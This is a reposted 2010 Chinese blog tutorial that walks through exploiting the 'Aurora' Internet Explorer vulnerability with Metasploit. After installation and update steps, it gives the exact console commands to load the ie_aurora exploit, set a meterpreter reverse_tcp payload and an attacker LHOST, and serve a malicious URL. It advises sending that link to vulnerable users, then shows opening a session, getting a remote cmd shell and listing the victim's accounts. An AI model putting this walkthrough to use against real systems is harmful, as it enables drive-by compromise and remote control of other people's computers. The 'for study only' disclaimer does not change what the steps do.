标题: “极光”IE 0day漏洞测试方法 出处:大漠荒颜 时间:Fri, 22 Jan 2010 10:04:41 +0000 作者:北纬36度 地址:http://www.736202.com/read.php/139.htm 内容: 漏洞测试方法演示: 注:此攻击方法仅供学习和技术研究之用,非法利用后果自负! 对于此漏洞的简单描述在SecurityFocus已经有所介绍,同时也给出了漏洞测试程序,地址:http://www.securityfocus.com/bid/37815/ 点击在新窗口中浏览此图片 http://www.antiyfx.com/uploads/100119/2-100119162423534.jpg 这里我们用国外著名的Metasploit Framework溢出工具包来对这个漏洞做演示。 介绍: Metasploit Framework是一款开源的安全漏洞检测工具。由于Metasploit Framework是免费的工具,因此安全工作人员常用Metasploit Framework工具来检测系统的 安全性。 Metasploit Framework可从其官网http://www.metasploit.com 上面根据自己使用的操作系统类型进行下载,目前最新版本为Metasploit Framework 3.3.3,这里以Windows下的版本为例做演示,在使用Metasploit Framework之前需要进行安装,安装方法如下: 点击在新窗口中浏览此图片 http://www.antiyfx.com/uploads/100119/2-100119162459104.jpg 点击在新窗口中浏览此图片 http://www.antiyfx.com/uploads/100119/2-100119162553E2.jpg 点击在新窗口中浏览此图片 http://www.antiyfx.com/uploads/100119/2-10011916262N24.jpg 点击在新窗口中浏览此图片 http://www.antiyfx.com/uploads/100119/2-100119162A5F7.jpg 点击在新窗口中浏览此图片 http://www.antiyfx.com/uploads/100119/2-100119162I1F5.jpg 由于此工具包捆绑了NMap扫描器,所以安装的中途会提示是否安装NMap扫描器,可根据您的需要来安装,这里我们跳过不安装,所以选择“否”来继续安装Metasploit Framework。 点击在新窗口中浏览此图片 http://www.antiyfx.com/uploads/100119/2-100119162PK45.jpg 如上图:安装结束后会默认勾选启动Metasploit Framework。 点击在新窗口中浏览此图片 http://www.antiyfx.com/uploads/100119/2-100119162SR29.jpg 如上图:安装完成后会在桌面上生产两个图标,其中Metasploit Update顾名思义为Metasploit Framework的更新程序,在使用之前建议点击此图标使其漏洞库更新到最新的,Metasploit Console为Metasploit Framework的溢出攻击控制台程序。 在安装结束后会自动弹出一个黑窗口,如下图,此窗口为正在初始化Metasploit Framework的攻击测试环境,大家不要将其关闭掉。 点击在新窗口中浏览此图片 http://www.antiyfx.com/uploads/100119/2-100119162Z94M.jpg 当初始化环境结束后会自动进入到溢出攻击测试控制台,如下图: 点击在新窗口中浏览此图片 http://www.antiyfx.com/uploads/100119/2-100119162939201.jpg 如上图:根据控制台的提示漏洞库比较陈旧,所以我们需要将其更新到最新的漏洞库,这时我们只需将这个控制台关掉然后点击桌面上的Metasploit Update即可,如下图: 点击在新窗口中浏览此图片 http://www.antiyfx.com/uploads/100119/2-100119163031556.jpg 点击在新窗口中浏览此图片 http://www.antiyfx.com/uploads/100119/2-100119163103L5.jpg 点击在新窗口中浏览此图片 http://www.antiyfx.com/uploads/100119/2-100119163210955.jpg 点击在新窗口中浏览此图片 http://www.antiyfx.com/uploads/100119/2-1001191633401c.jpg 如图:大约需要几分钟的时间就可以更新完成,更新时间具体依网速而定。 点击在新窗口中浏览此图片 http://www.antiyfx.com/uploads/100119/2-100119163410593.jpg 如上图:为程序更新完成后的启动界面 点击在新窗口中浏览此图片 http://www.antiyfx.com/uploads/100119/2-1001191150505U.jpg 如上图:首先我们敲入use exploit/windows/browser/ie_aurora命令来让溢出攻击平台挂载ie_aurora攻击测试脚本。 点击在新窗口中浏览此图片 http://www.antiyfx.com/uploads/100119/2-100119115414Z9.jpg 如上图:敲入set PAYLOAD windows/meterpreter/reverse_tcp命令来设置反弹连接所用的传输协议即TCP协议。注意:命令中的PAYLOAD为大写。 点击在新窗口中浏览此图片 http://www.antiyfx.com/uploads/100119/2-10011911545NP.jpg 如上图:敲入set LHOST 10.0.95.250 来设置攻击者的IP地址,也就是本机IP地址。 点击在新窗口中浏览此图片 http://www.antiyfx.com/uploads/100119/2-100119115541404.jpg 如上图:敲入exploithttp://10.0.95.250:8080/sBek5LTL 为攻击的URL,将这个URL发给存在此漏洞的用户点击就可以触发IE浏览器溢出进而执行恶意指令,这里我在虚拟机中点击这个链接测试。命令表示开始溢出,其中 点击在新窗口中浏览此图片 http://www.antiyfx.com/uploads/100119/2-1001191156401M.jpg 如上图:当在存在此漏洞的计算机上点击这个URL链接,溢出攻击控制台就会显示正在发送溢出指令到客户端。 点击在新窗口中浏览此图片 http://www.antiyfx.com/uploads/100119/2-100119115H5504.jpg 如上图:当存在此漏洞的计算机上触发这个链接,就会发生溢出,一旦溢出成功就会导致IE浏览器无响应。 点击在新窗口中浏览此图片 http://www.antiyfx.com/uploads/100119/2-10011911594H55.jpg 如上图:敲入sessions –i 1命令 我们来与客户端创建一个连接会话。 点击在新窗口中浏览此图片 http://www.antiyfx.com/uploads/100119/2-100119120030946.jpg 如上图:敲入getuid命令可以查看远端计算机的计算机名和用户名。 点击在新窗口中浏览此图片 http://www.antiyfx.com/uploads/100119/2-100119120101219.jpg 如上图:敲入shell命令就可以得到远端计算机的cmdshell了,这里我们敲入Windows系统下的查看系统用户的命令net user测试一下,命令回显出了远端计算机上的所有用户。至此溢出攻击就完成了。 本文转载于:http://www.antiyfx.com Generated by Bo-blog 2.1.1 Release